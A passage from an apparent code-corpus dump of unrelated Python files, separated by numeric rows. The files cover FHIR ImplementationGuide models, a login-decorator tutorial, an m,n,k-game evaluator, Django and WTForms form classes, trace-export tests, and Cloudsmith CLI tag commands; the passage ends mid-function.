        enum_reference_types=["StructureDefinition"],
    )

    type: fhirtypes.Code = Field(
        ...,
        alias="type",
        title="Type this profile applies to",
        description="The type of resource that all instances must conform to.",
    )
class ImplementationGuidePackage(backboneelement.BackboneElement):
    """Group of resources as used in .page.package.

    A logical group of resources. Logical groups can be used when building
    pages. ``name`` and ``resource`` are required; ``description`` is optional.
    """

    resource_type = Field("ImplementationGuidePackage", const=True)

    description: fhirtypes.String = Field(
        None,
        alias="description",
        title="Type `str`.",
        description="Human readable text describing the package.",
    )

    name: fhirtypes.String = Field(
        ...,
        alias="name",
        title="Type `str`.",
        description="Name used .page.package.",
    )

    resource: ListType[fhirtypes.ImplementationGuidePackageResourceType] = Field(
        ...,
        alias="resource",
        title=(
            "List of `ImplementationGuidePackageResource` items (represented as `dict` "
            "in JSON)."
        ),
        description="Resource in the implementation guide.",
    )
class ImplementationGuidePackageResource(backboneelement.BackboneElement):
    """Resource in the implementation guide.

    A resource that is part of the implementation guide. Conformance resources
    (value set, structure definition, conformance statements etc.) are obvious
    candidates for inclusion, but any kind of resource can be included as an
    example resource.

    ``sourceReference`` and ``sourceUri`` form the choice element
    ``source[x]``: exactly one of them must be supplied (enforced by
    ``validate_one_of_many`` below).
    """

    resource_type = Field("ImplementationGuidePackageResource", const=True)

    acronym: fhirtypes.String = Field(
        None,
        alias="acronym",
        title="Type `str`.",
        description="Short code to identify the resource.",
    )

    description: fhirtypes.String = Field(
        None,
        alias="description",
        title="Type `str`.",
        description="Reason why included in guide.",
    )

    exampleFor: fhirtypes.ReferenceType = Field(
        None,
        alias="exampleFor",
        title=(
            "Type `Reference` referencing `StructureDefinition` (represented as `dict` "
            "in JSON)."
        ),
        description="Resource this is an example of (if applicable).",
        # note: Listed Resource Type(s) should be allowed as Reference.
        enum_reference_types=["StructureDefinition"],
    )

    name: fhirtypes.String = Field(
        None,
        alias="name",
        title="Type `str`.",
        description="Human Name for the resource.",
    )

    purpose: fhirtypes.Code = Field(
        ...,
        alias="purpose",
        title="Type `str`.",
        description=(
            "example | terminology | profile | extension | dictionary | logical."
        ),
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=[
            "example",
            "terminology",
            "profile",
            "extension",
            "dictionary",
            "logical",
        ],
    )

    sourceReference: fhirtypes.ReferenceType = Field(
        None,
        alias="sourceReference",
        title="Type `Reference` referencing `Resource` (represented as `dict` in JSON).",
        description="Location of the resource.",
        # Choice of Data Types. i.e timing[x]
        one_of_many="source",
        one_of_many_required=True,
        # note: Listed Resource Type(s) should be allowed as Reference.
        enum_reference_types=["Resource"],
    )

    sourceUri: fhirtypes.Uri = Field(
        None,
        alias="sourceUri",
        title="Type `str`.",
        description="Location of the resource.",
        # Choice of Data Types. i.e timing[x]
        one_of_many="source",
        one_of_many_required=True,
    )

    @root_validator(pre=True)
    def validate_one_of_many(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        """https://www.hl7.org/fhir/formats.html#choice
        A few elements have a choice of more than one data type for their content.
        All such elements have a name that takes the form nnn[x].
        The "nnn" part of the name is constant, and the "[x]" is replaced with
        the title-cased name of the type that is actually used.
        The table view shows each of these names explicitly.

        Elements that have a choice of data type cannot repeat - they must have a
        maximum cardinality of 1. When constructing an instance of an element with a
        choice of types, the authoring system must create a single element with a
        data type chosen from among the list of permitted data types.
        """
        # Maps each choice-element prefix to the concrete field names that
        # realize it on this class.
        one_of_many_fields = {
            "source": ["sourceReference", "sourceUri"],
        }
        for prefix, fields in one_of_many_fields.items():
            # Sanity-check that the field metadata agrees with the mapping above.
            assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix
            required = (
                cls.__fields__[fields[0]].field_info.extra["one_of_many_required"]
                is True
            )
            found = False
            for field in fields:
                if field in values and values[field] is not None:
                    if found is True:
                        # More than one variant of the same choice element was given.
                        raise ValueError(
                            "Any of one field value is expected from "
                            f"this list {fields}, but got multiple!"
                        )
                    else:
                        found = True
            if required is True and found is False:
                raise ValueError(f"Expect any of field value from this list {fields}.")
        return values
class ImplementationGuidePage(backboneelement.BackboneElement):
    """Page/Section in the Guide.

    A page / section in the implementation guide. The root page is the
    implementation guide home page. ``kind``, ``name`` and ``source`` are
    required; nested sub-pages recurse through the ``page`` field.
    """

    resource_type = Field("ImplementationGuidePage", const=True)

    format: fhirtypes.Code = Field(
        None,
        alias="format",
        title="Type `str`.",
        description="Format of the page (e.g. html, markdown, etc.).",
    )

    kind: fhirtypes.Code = Field(
        ...,
        alias="kind",
        title="Type `str`.",
        description=(
            "page | example | list | include | directory | dictionary | toc | resource."
        ),
        # note: Enum values can be used in validation,
        # but use in your own responsibilities, read official FHIR documentation.
        enum_values=[
            "page",
            "example",
            "list",
            "include",
            "directory",
            "dictionary",
            "toc",
            "resource",
        ],
    )

    name: fhirtypes.String = Field(
        ...,
        alias="name",
        title="Type `str`.",
        description="Short name shown for navigational assistance.",
    )

    package: ListType[fhirtypes.String] = Field(
        None,
        alias="package",
        title="List of `str` items.",
        description="Name of package to include.",
    )

    # Recursive type: a page can contain nested pages/sections.
    page: ListType[fhirtypes.ImplementationGuidePageType] = Field(
        None,
        alias="page",
        title=(
            "List of `ImplementationGuidePage` items (represented as `dict` in JSON)."
        ),
        description="Nested Pages / Sections.",
    )

    source: fhirtypes.Uri = Field(
        ...,
        alias="source",
        title="Type `Uri`.",
        description="Where to find that page.",
    )

    type: ListType[fhirtypes.Code] = Field(
        None,
        alias="type",
        title="List of `Code` items.",
        description="Kind of resource to include in the list.",
    )
| 18,060 | 4,588 |
##-----------Non parametric decorator----------------
####initialization
##name = 'a'
##password = '1'
##user_status = False
##
####decorator
##def login(func):
## def inner():
## global name,password,user_status
## if user_status == True:
## pass
## else:
## n = input('name:')
## p = input('password:')
## if n == name and p == password:
## user_status = True
## if user_status:
## func()
## return inner
##
##@login
##def webpage1():
## print('webpage---1')
##@login
##def webpage2():
## print('webpage---2')
##
####webpage1 = login(webpage1)##original method1
####webpage2 = login(webpage2)##original method2
##webpage1()
##webpage2()
##-----------Non parametric decorator----------------
####-----------Parametric decorator--------------------
####initialization
##name = 'a'
##password = '1'
##user_status = False
##
####decorator
##def login(func):
## def inner(*args,**kwargs):##arbitrary parameters can be passed in
## global name,password,user_status
## if user_status == True:
## pass
## else:
## n = input('name:')
## p = input('password:')
## if n == name and p == password:
## user_status = True
## if user_status:
## func(*args,**kwargs)##arbitrary parameters can be passed in
## return inner
##
##@login
##def webpage1(arg):
## print('webpage---1',arg)
##@login
##def webpage2():
## print('webpage---2')
##
####webpage1 = login(webpage1)##original method1
####webpage2 = login(webpage2)##original method2
##webpage1('111')
##webpage2()
####-----------Parametric decorator--------------------
##-----------Multi-layer decorator--------------------
##initialization
name = 'a'           # expected login name
password = '1'       # expected login password
user_status = False  # flips to True once a user has authenticated
##decorator
def login(auth_type):
    """Parametrised login decorator (decorator factory).

    ``auth_type`` selects the authentication scheme; only 'qq' is implemented.
    The wrapped function runs only after a successful login; a successful
    login is cached in the module-level ``user_status`` flag, so subsequent
    calls skip the prompt.
    """
    def outer(func):
        def inner(*args, **kwargs):  # arbitrary parameters can be passed in
            global name, password, user_status
            if auth_type == 'qq':
                if not user_status:
                    # prompt for credentials until the first successful login
                    n = input('name:')
                    p = input('password:')
                    if n == name and p == password:
                        user_status = True
                if user_status:
                    # Bug fix: propagate the wrapped function's return value
                    # (it was previously discarded, so decorated functions
                    # always returned None).
                    return func(*args, **kwargs)
            else:
                print('auth_type is wrong!')
        return inner
    return outer
@login('qq')
def webpage1(arg):
    # Protected page: runs only after a successful 'qq' login.
    print('webpage---1',arg)
@login('weixin')
def webpage2():
    # Decorated with an unsupported auth_type, so calling it only prints
    # "auth_type is wrong!" (see login()).
    print('webpage---2')
##temp = login("qq")##original method1
##webpage1 = temp(webpage1)
# First call triggers the interactive login prompt.
webpage1('111')
##-----------Multi-layer decorator--------------------
| 2,796 | 814 |
import numpy as np
from game import Game
class MNKgame(Game):
    """
    https://en.wikipedia.org/wiki/M,n,k-game

    Board is an n x m grid (rows 0..n-1, columns 0..m-1); a player wins by
    placing k of their marks in a row horizontally, vertically or diagonally.
    Player marks are 1, opponent marks are -1, empty cells are 0.
    If m=3, n=3, k=3 this is TicTakToe and default.
    """

    def __init__(self, n=3, m=3, k=3, field=None):
        self.n = n  # number of rows
        self.m = m  # number of columns
        self.k = k  # marks in a row needed to win
        self.field = field
        if field is None:
            self.field = np.zeros((n, m))
        self.winner = 0

    def evaluate(self, field) -> int:
        """Return 1 if player (1) has k in a row, -1 if the opponent does, else 0.

        Each direction is scanned starting from border cells so every full
        line of the board is covered.
        (Annotation fixed: this returns an int score, not a bool.)
        """
        # down: vertical lines start from the top row
        for x in range(self.m):
            score = self.scan(field, (1, 0), 0, x)
            if score != 0:
                return score
        # right: horizontal lines start from the left column
        for y in range(self.n):
            score = self.scan(field, (0, 1), y, 0)
            if score != 0:
                return score
        # right-down diagonals start from the top row and the left column
        for x in range(self.m):
            score = self.scan(field, (1, 1), 0, x)
            if score != 0:
                return score
        for y in range(self.n):
            score = self.scan(field, (1, 1), y, 0)
            if score != 0:
                return score
        # right-up diagonals start from the bottom row and the left column.
        # Bug fix: previously started at row self.m (out of range unless
        # n == m) and iterated columns with range(self.n) / rows with
        # range(self.m), which skipped or duplicated lines on non-square boards.
        for x in range(self.m):
            score = self.scan(field, (-1, 1), self.n - 1, x)
            if score != 0:
                return score
        for y in range(self.n):
            score = self.scan(field, (-1, 1), y, 0)
            if score != 0:
                return score
        return 0

    def scan(self, field, d, i, j) -> int:
        """Walk from (i, j) in direction d counting consecutive equal marks.

        Returns 1 (player) or -1 (enemy) as soon as either side reaches k
        consecutive marks along the walk, 0 if the walk leaves the board first.
        (Annotation fixed: returns an int score, not a bool.)
        """
        cnt_player = 0
        cnt_enemy = 0
        while(self.is_in_field(i, j)):
            if int(field[i][j]) == 1:
                cnt_player += 1
                # Bug fix: a player mark breaks an enemy streak (and vice
                # versa); previously the opposite counter was never reset,
                # so e.g. [1, 1, -1, 1] counted as three player marks in a row.
                cnt_enemy = 0
                if cnt_player == self.k:
                    return 1
            elif int(field[i][j]) == -1:
                cnt_enemy += 1
                cnt_player = 0
                if cnt_enemy == self.k:
                    return -1
            else:
                cnt_player = 0
                cnt_enemy = 0
            i += d[0]
            j += d[1]
        return 0

    def is_in_field(self, i, j):
        """True iff (i, j) is a valid board coordinate."""
        if 0 <= i and i < self.n and 0 <= j and j < self.m:
            return True
        return False

    def update(self, action, val):
        """Place mark val at board position action=(row, col)."""
        self.field[action[0]][action[1]] = val

    def get_actions(self, field):
        """Return all empty cells of field as a list of (row, col) tuples."""
        indexes = np.where(field == 0)
        if len(indexes[0]) == 0:
            return []
        return list(zip(indexes[0], indexes[1]))
| 2,325 | 778 |
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .choices import *
from django.contrib.auth.forms import AuthenticationForm
from django.core.exceptions import ObjectDoesNotExist
from django.forms import ValidationError
# override basic authentication form to allow logging in with email or username
class EmailAuthenticationForm(AuthenticationForm):
    """AuthenticationForm that also accepts an email address as the username."""

    def clean_username(self):
        """Resolve an email address in the username field to the account's username.

        Raises the standard ``invalid_login`` ValidationError when no user
        with that email address exists; plain usernames pass through unchanged.
        """
        username = self.data['username']
        if '@' in username:
            try:
                username = User.objects.get(email=username).username
            except ObjectDoesNotExist:
                raise ValidationError(
                    self.error_messages['invalid_login'],
                    code='invalid_login',
                    params={'username': self.username_field.verbose_name},
                )
        return username
# override basic user creation for to add required email field
class NewUserForm(UserCreationForm):
    """Sign-up form extending UserCreationForm with a mandatory email field."""

    email = forms.EmailField(required=True)

    class Meta:
        model = User
        fields = ("username", "email", "password1", "password2")

    def save(self, commit=True):
        """Build the User instance; persist it only when commit is True."""
        new_user = super().save(commit=False)
        if commit:
            new_user.save()
        return new_user
# form for creating basic text note
class NoteForm(forms.Form):
    """Form for creating a basic text note (title, free text, theme)."""

    title = forms.CharField(max_length=100)
    content = forms.CharField(
        widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}), required=False)
    theme = forms.ChoiceField(choices=THEMES, label="Theme", initial='', widget=forms.Select(), required=True)
# form for creating list note
class NoteListForm(forms.Form):
    """Form for creating a list note; items are entered one at a time."""

    title = forms.CharField(max_length=100)
    content = forms.CharField(required=False, label="List items",
                              widget=forms.TextInput(attrs={'placeholder': 'Add item and press Enter'}))
    theme = forms.ChoiceField(choices=THEMES, label="Theme", initial='', widget=forms.Select(), required=True)
# form for creating picture note
class NotePictureForm(forms.Form):
    """Form for creating a picture note; the image upload is required."""

    title = forms.CharField(max_length=100)
    content = forms.CharField(
        widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}), required=False)
    picture = forms.ImageField()
# override picture note form to show actual picture path
class NotePictureFormUpdate(forms.Form):
    """Variant of NotePictureForm for editing: the picture is optional so the
    existing image can be kept."""

    title = forms.CharField(max_length=100)
    content = forms.CharField(
        widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}),
        required=False)
    picture = forms.ImageField(required=False)
| 2,721 | 764 |
from common import initialize_test_yml_list_measurement
from view import VIEW
import pathlib as pl
import shutil
from view.python_core.ctvs import get_all_available_ctvs
from view.python_core.gdm_generation.gdm_data_classes import GDMFile
class TraceExporter(object):
    """Test helper: loads the shared test animal via VIEW and exports
    glodatamix trace files under <STG_OdorReportPath>/test_gdms."""

    def __init__(self):
        super().__init__()
        # test YAML plus one animal/measurement from the shared test fixtures
        test_yml, self.test_animal, self.test_measu = initialize_test_yml_list_measurement()
        self.view = VIEW()
        self.view.update_flags_from_ymlfile(test_yml)

    def load_and_export(self, flags_to_update, file_suffix, flags_suffix):
        """Export glodatamix traces for all measurements of the test animal.

        :param flags_to_update: dict of VIEW flags overridden before the export
        :param file_suffix: appended to the per-animal output folder name
        :param flags_suffix: appended to the output file name (before extension)
        """
        self.view.update_flags(flags_to_update)
        self.view.initialize_animal(self.test_animal)
        roi_data_dict, roi_file = self.view.get_roi_info_for_current_animal()
        # initialize an empty GDMFile to accumulate data
        gdm_file = GDMFile()
        # iterate over measurements of the animal
        for measu in self.view.get_measus_for_current_animal(analyze_values_to_use=(1,)):
            # load a measurement for the animal
            self.view.load_measurement_data_from_current_animal(measu)
            # calculate signals
            self.view.calculate_signals()
            # create glodatamix for the loaded measurement
            gdm_file_this_measu, _ = self.view.get_gdm_file_for_current_measurement(roi_data_dict)
            # accumulate
            gdm_file.append_from_a_gdm_file(gdm_file_this_measu)
        # compose output file name
        output_file = self.view.flags.get_gloDatamix_file_for_current_animal()
        output_file_path = pl.Path(output_file)
        test_gdm_folder =\
            pl.Path(self.view.flags["STG_OdorReportPath"]) / "test_gdms" / \
            f"{output_file_path.stem}{file_suffix}"
        if not test_gdm_folder.is_dir():
            test_gdm_folder.mkdir(parents=True)
        test_output_file = test_gdm_folder / f"gdm{flags_suffix}{output_file_path.suffix}"
        # save gloDatamix file
        gdm_file.write_to_csv(test_output_file)
def test_export_traces_rois():
    """
    Testing exporting traces using .roi files

    For every FakeData*.roi file in the odor-mask folder, copy it over
    Fake_data.roi and run one export whose suffix encodes the source file.
    """
    exporter = TraceExporter()
    coor_path = pl.Path(exporter.view.flags["STG_OdormaskPath"])
    dest_roi_file = coor_path / "Fake_data.roi"
    for fle in coor_path.iterdir():
        if fle.name.startswith("FakeData") and fle.suffix == ".roi":
            shutil.copy(str(fle), str(dest_roi_file))
            # Bug fix: the export belongs inside the loop -- previously it ran
            # once after the loop using the loop variable `fle` (the last file
            # iterated, not necessarily a FakeData .roi file; NameError on an
            # empty directory). Also, str.lstrip('FakeData') strips a character
            # *set*, not the prefix, so use slicing instead.
            exporter.load_and_export(
                flags_to_update={"RM_ROITrace": 3},
                file_suffix=f"_from_roi{fle.stem[len('FakeData'):]}",
                flags_suffix="_defaults"
            )
    # remove the scratch copy if any export ran
    if dest_roi_file.is_file():
        dest_roi_file.unlink()
def test_export_traces_mask_tif():
    """
    Testing exporting traces using .roi.tif files
    """
    exporter = TraceExporter()
    flag_overrides = {"RM_ROITrace": 4}
    exporter.load_and_export(flags_to_update=flag_overrides,
                             file_suffix="_from_roi_tif",
                             flags_suffix="_defaults")
def test_export_traces_different_ctvs():
    """
    Testing exporting traces with different CTVs
    """
    exporter = TraceExporter()
    for ctv_method in get_all_available_ctvs():
        flag_overrides = {"RM_ROITrace": 3, "CTV_Method": ctv_method}
        exporter.load_and_export(
            flags_to_update=flag_overrides,
            file_suffix="_from_roi",
            flags_suffix=f"_ctv{ctv_method}",
        )
def test_export_traces_within_ROI():
    """
    Testing exporting traces considering the area file
    """
    exporter = TraceExporter()
    flag_overrides = {"RM_ROITrace": 3, "GDM_withinArea": True}
    exporter.load_and_export(flags_to_update=flag_overrides,
                             file_suffix="_from_roi",
                             flags_suffix="_withinArea_True")
def test_export_traces_chunks_only():
    """
    Testing exporting traces as pre/post-stimulus chunks: once with a 2-second
    window and once with a 100-second window (effectively the full trace).
    """
    exporter = TraceExporter()
    for window_seconds, suffix in ((2, "_2secPrePostStim"), (100, "_full")):
        exporter.load_and_export(
            flags_to_update={
                "RM_ROITrace": 3,
                "GDM_outputType": "chunks_only",
                "GDM_chunkPostStim": window_seconds,  # in seconds
                "GDM_chunkPreStim": window_seconds,  # in seconds
            },
            file_suffix="_chunks_only",
            flags_suffix=suffix,
        )
if __name__ == '__main__':
    # Run a subset of the tests directly; the commented-out calls can be
    # re-enabled for local debugging.
    test_export_traces_rois()
    # test_export_traces_mask_tif()
    # test_export_traces_within_ROI()
    test_export_traces_chunks_only()
from wtforms import Form, StringField, TextAreaField,SelectField, FileField,HiddenField
from wtforms.validators import DataRequired, Optional, Email, URL, Length
from models import Entry, Tag
class TagField(StringField):
    """StringField that maps a comma-separated string to Tag model instances."""

    def _value(self):
        # Render the bound Tag objects back into "a, b, c" form for display.
        if self.data:
            return ', '.join([tag.name for tag in self.data])
        return ''

    def get_tags_from_string(self, tag_string):
        """Turn 'a, b, c' into a list of Tag objects (existing + unsaved new)."""
        # Split on commas and drop blank entries.
        tag_names = [piece.strip() for piece in tag_string.split(',') if piece.strip()]
        # Tags already stored in the database.
        existing_tags = Tag.query.filter(Tag.name.in_(tag_names))
        existing_list = list(existing_tags)
        # Names with no stored counterpart become unsaved Tag instances.
        new_names = set(tag_names) - {tag.name for tag in existing_list}
        unsaved_tags = [Tag(name=name) for name in new_names]
        return existing_list + unsaved_tags

    def process_formdata(self, valuelist):
        # Form submitted values arrive as a list; only the first entry matters.
        self.data = self.get_tags_from_string(valuelist[0]) if valuelist else []
class ImageForm(Form):
    """Form for uploading a single image file."""

    file = FileField('Image File')
class EntryForm(Form):
    """Form for creating or editing a blog entry (title, body, status, tags)."""

    title = StringField('Title', validators=[DataRequired()])
    body = TextAreaField('Body', validators=[DataRequired()])
    status = SelectField(
        'Entry Status',
        choices=(
            (Entry.STATUS_PUBLIC,'Public'),
            (Entry.STATUS_DRAFT,'Draft')),
        coerce=int
    )
    tags = TagField(
        'Tag',
        description='Separate multiple tags with commas.'
    )

    def save_entry(self, entry):
        """Copy form data onto entry, refresh its slug, and return it.

        Note: the entry is not committed here; the caller persists it.
        """
        self.populate_obj(entry)
        entry.generate_slug()
        return entry
class CommentForm(Form):
    """Form for posting a comment; only valid against a public entry."""

    name = StringField('Name',validators=[DataRequired()])
    email = StringField('Email',validators=[DataRequired(),Email()])
    url = StringField('Url', validators=[Optional(), URL()])
    body = TextAreaField('Comment', validators=[DataRequired(),Length(min=10, max=3000)])
    entry_id = HiddenField(validators=[DataRequired()])

    def validate(self):
        # Standard field-level validation first.
        if not super(CommentForm, self).validate():
            return False
        # The comment must target an existing, public entry.
        target_entry = Entry.query.filter(
            (Entry.status == Entry.STATUS_PUBLIC),
            (Entry.id == self.entry_id.data)
        ).first()
        return target_entry is not None
# -*- coding: utf-8 -*-
"""CLI/Commands - List objects."""
from __future__ import absolute_import, print_function, unicode_literals
from operator import itemgetter
import click
from ...core.api.packages import (
get_package_tags as api_get_package_tags,
tag_package as api_tag_package,
)
from .. import command, decorators, utils, validators
from ..exceptions import handle_api_exceptions
from ..utils import maybe_spinner
from .main import main
def _parse_tags(tags):
"""Parse tags from CSV into a list."""
return [x.strip() for x in (tags or "").split(",")]
def _print_tags(opts, all_tags, all_immutable_tags):
    """Print the tags for a package, as JSON (if requested) or a pretty table."""
    combined = {"tags": all_tags, "tags_immutable": all_immutable_tags}
    if utils.maybe_print_as_json(opts, combined):
        return

    # One row per tag: name, tag type, and whether it is immutable.
    table_rows = []
    for tag_type in sorted(all_tags):
        immutable_for_type = all_immutable_tags.get(tag_type) or []
        for tag in sorted(all_tags[tag_type]):
            flag = "Yes" if tag in immutable_for_type else "No"
            table_rows.append(
                [
                    click.style(tag, fg="cyan"),
                    click.style(tag_type, fg="yellow"),
                    click.style(flag, fg="magenta"),
                ]
            )

    if all_tags:
        click.echo()
    utils.pretty_print_table(["Tag", "Type", "Immutable"], table_rows)
    click.echo()

    count = len(table_rows)
    suffix = "tag%s" % ("s" if count != 1 else "")
    utils.pretty_print_list_info(num_results=count, suffix=suffix)
# Click group: `cloudsmith tags ...` (aliased as `tag`); subcommands are
# registered on it below.
@main.group(name="tags", cls=command.AliasGroup, aliases=["tag"])
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.pass_context
def tags_(ctx, opts):  # pylint: disable=unused-argument
    """
    Manage the tags for a package in a repository.

    See the help for subcommands for more information on each.
    """
@tags_.command(name="list", aliases=["ls"])
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
    "owner_repo_package",
    metavar="OWNER/REPO/PACKAGE",
    callback=validators.validate_owner_repo_package,
)
@click.pass_context
def list_tags(ctx, opts, owner_repo_package):
    """
    List tags for a package in a repository.

    This requires appropriate (read) permissions for the package.

    - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
    REPO name where the package is stored, and the PACKAGE identifier of the
    package itself. All separated by a slash.

    Example: 'your-org/awesome-repo/better-pkg'.

    Full CLI example:

      $ cloudsmith tags list your-org/awesome-repo/better-pkg
    """
    # validator callback has already split OWNER/REPO/PACKAGE into a tuple
    owner, repo, package = owner_repo_package
    # progress message; nl=False so OK/failure status lands on the same line
    click.echo(
        "Listing tags for the '%(package)s' package ... "
        % {"package": click.style(package, bold=True)},
        nl=False,
    )
    context_msg = "Failed to list tags for the package!"
    with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
        with maybe_spinner(opts):
            package_tags, package_tags_immutable = api_get_package_tags(
                owner=owner, repo=repo, identifier=package
            )
    click.secho("OK", fg="green")
    _print_tags(opts, package_tags, package_tags_immutable)
@tags_.command(name="add")
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
    "owner_repo_package",
    metavar="OWNER/REPO/PACKAGE",
    callback=validators.validate_owner_repo_package,
)
@click.argument("tags", metavar="TAGS")
@click.option(
    "--immutable",
    default=False,
    is_flag=True,
    help=(
        "If true, the tags created will be immutable (cannot be changed). In "
        "practice, this means the tags cannot be (easily) deleted. A repository "
        "admin can explicitly remove immutable tags."
    ),
)
@click.pass_context
def add_tags(ctx, opts, owner_repo_package, tags, immutable):
    """
    Add tags to a package in a repository.

    This requires appropriate (write) permissions for the package.

    - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
    REPO name where the package is stored, and the PACKAGE identifier of the
    package itself. All separated by a slash.

    Example: 'your-org/awesome-repo/better-pkg'.

    - TAGS: A comma-separated value list of the tags you want to add.

    Example: foo,bar

    Full CLI example:

      $ cloudsmith tags add your-org/awesome-repo/better-pkg foo,bar
    """
    # validator callback has already split OWNER/REPO/PACKAGE into a tuple
    owner, repo, package = owner_repo_package
    # CSV string -> list of tag names
    tags = _parse_tags(tags)
    # progress message; nl=False so OK/failure status lands on the same line
    click.echo(
        "Adding '%(tags)s' tag%(s)s to the '%(package)s' package ... "
        % {
            "package": click.style(package, bold=True),
            "tags": click.style(", ".join(tags or [])),
            "s": "s" if len(tags) != 1 else "",
        },
        nl=False,
    )
    context_msg = "Failed to add tags to package!"
    with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
        with maybe_spinner(opts):
            package_tags, package_tags_immutable = api_tag_package(
                owner=owner,
                repo=repo,
                identifier=package,
                data={"action": "add", "tags": tags, "is_immutable": immutable},
            )
    click.secho("OK", fg="green")
    _print_tags(opts, package_tags, package_tags_immutable)
@tags_.command(name="clear")
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
    "owner_repo_package",
    metavar="OWNER/REPO/PACKAGE",
    callback=validators.validate_owner_repo_package,
)
@click.pass_context
def clear_tags(ctx, opts, owner_repo_package):
    """
    Clear all existing (non-immutable) tags from a package in a repository.

    This requires appropriate (write) permissions for the package.

    - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
    REPO name where the package is stored, and the PACKAGE identifier of the
    package itself. All separated by a slash.

    Example: 'your-org/awesome-repo/better-pkg'.

    Full CLI example:

    $ cloudsmith tags clear your-org/awesome-repo/better-pkg
    """
    # The validator callback has already split OWNER/REPO/PACKAGE into a tuple.
    owner, repo, package = owner_repo_package
    click.echo(
        "Clearing tags on the '%(package)s' package ... "
        % {"package": click.style(package, bold=True)},
        nl=False,  # completion status ("OK") is appended on the same line below
    )

    context_msg = "Failed to clear tags on package!"
    with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
        with maybe_spinner(opts):
            # "clear" removes all non-immutable tags; no tag list is needed.
            package_tags, package_tags_immutable = api_tag_package(
                owner=owner, repo=repo, identifier=package, data={"action": "clear"}
            )

    click.secho("OK", fg="green")
    # Show the remaining (immutable) tag sets after the clear.
    _print_tags(opts, package_tags, package_tags_immutable)
@tags_.command(name="remove", aliases=["rm"])
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
    "owner_repo_package",
    metavar="OWNER/REPO/PACKAGE",
    callback=validators.validate_owner_repo_package,
)
@click.argument("tags", metavar="TAGS")
@click.pass_context
def remove_tags(ctx, opts, owner_repo_package, tags):
    """
    Remove tags from a package in a repository.

    This requires appropriate (write) permissions for the package.

    - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
    REPO name where the package is stored, and the PACKAGE identifier of the
    package itself. All separated by a slash.

    Example: 'your-org/awesome-repo/better-pkg'.

    - TAGS: A comma-separated value list of the tags you want to remove.

    Example: foo,bar

    Full CLI example:

    $ cloudsmith tags remove your-org/awesome-repo/better-pkg foo,bar
    """
    # The validator callback has already split OWNER/REPO/PACKAGE into a tuple.
    owner, repo, package = owner_repo_package
    # Normalize the comma-separated TAGS argument into a list of tag names.
    tags = _parse_tags(tags)
    click.echo(
        # FIX: message previously read "Removing ... tag(s) *to* the package";
        # tags are removed *from* a package (mirrors the docstring above).
        "Removing '%(tags)s' tag%(s)s from the '%(package)s' package ... "
        % {
            "package": click.style(package, bold=True),
            "tags": click.style(", ".join(tags or [])),
            # Pluralize "tag" only when there is not exactly one tag.
            "s": "s" if len(tags) != 1 else "",
        },
        nl=False,  # completion status ("OK") is appended on the same line below
    )

    context_msg = "Failed to remove tags from package!"
    # handle_api_exceptions turns API errors into user-facing CLI errors;
    # maybe_spinner shows a progress spinner unless output is non-interactive.
    with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
        with maybe_spinner(opts):
            package_tags, package_tags_immutable = api_tag_package(
                owner=owner,
                repo=repo,
                identifier=package,
                data={"action": "remove", "tags": tags},
            )

    click.secho("OK", fg="green")
    # Show the resulting (mutable + immutable) tag sets after the change.
    _print_tags(opts, package_tags, package_tags_immutable)
@tags_.command(name="replace")
@decorators.common_cli_config_options
@decorators.common_cli_output_options
@decorators.common_api_auth_options
@decorators.initialise_api
@click.argument(
    "owner_repo_package",
    metavar="OWNER/REPO/PACKAGE",
    callback=validators.validate_owner_repo_package,
)
@click.argument("tags", metavar="TAGS")
@click.option(
    "--immutable",
    default=False,
    is_flag=True,
    help=(
        "If true, the tags created will be immutable (cannot be changed). In "
        "practice, this means the tags cannot be (easily) deleted. A repository "
        "admin can explicitly remove immutable tags."
    ),
)
@click.pass_context
def replace_tags(ctx, opts, owner_repo_package, tags, immutable):
    """
    Replace all existing (non-immutable) tags on a package in a repository.

    This requires appropriate (write) permissions for the package.

    - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the
    REPO name where the package is stored, and the PACKAGE identifier of the
    package itself. All separated by a slash.

    Example: 'your-org/awesome-repo/better-pkg'.

    - TAGS: A comma-separated value list of the tags you want to replace existing with.

    Example: foo,bar

    Full CLI example:

    $ cloudsmith tags replace your-org/awesome-repo/better-pkg foo,bar
    """
    # The validator callback has already split OWNER/REPO/PACKAGE into a tuple.
    owner, repo, package = owner_repo_package
    # Normalize the comma-separated TAGS argument into a list of tag names.
    tags = _parse_tags(tags)
    click.echo(
        "Replacing existing with '%(tags)s' tag%(s)s on the '%(package)s' package ... "
        % {
            "package": click.style(package, bold=True),
            "tags": click.style(", ".join(tags or [])),
            # Pluralize "tag" only when there is not exactly one tag.
            "s": "s" if len(tags) != 1 else "",
        },
        nl=False,  # completion status ("OK") is appended on the same line below
    )

    context_msg = "Failed to replace tags on package!"
    with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):
        with maybe_spinner(opts):
            # "replace" swaps all non-immutable tags for the supplied list.
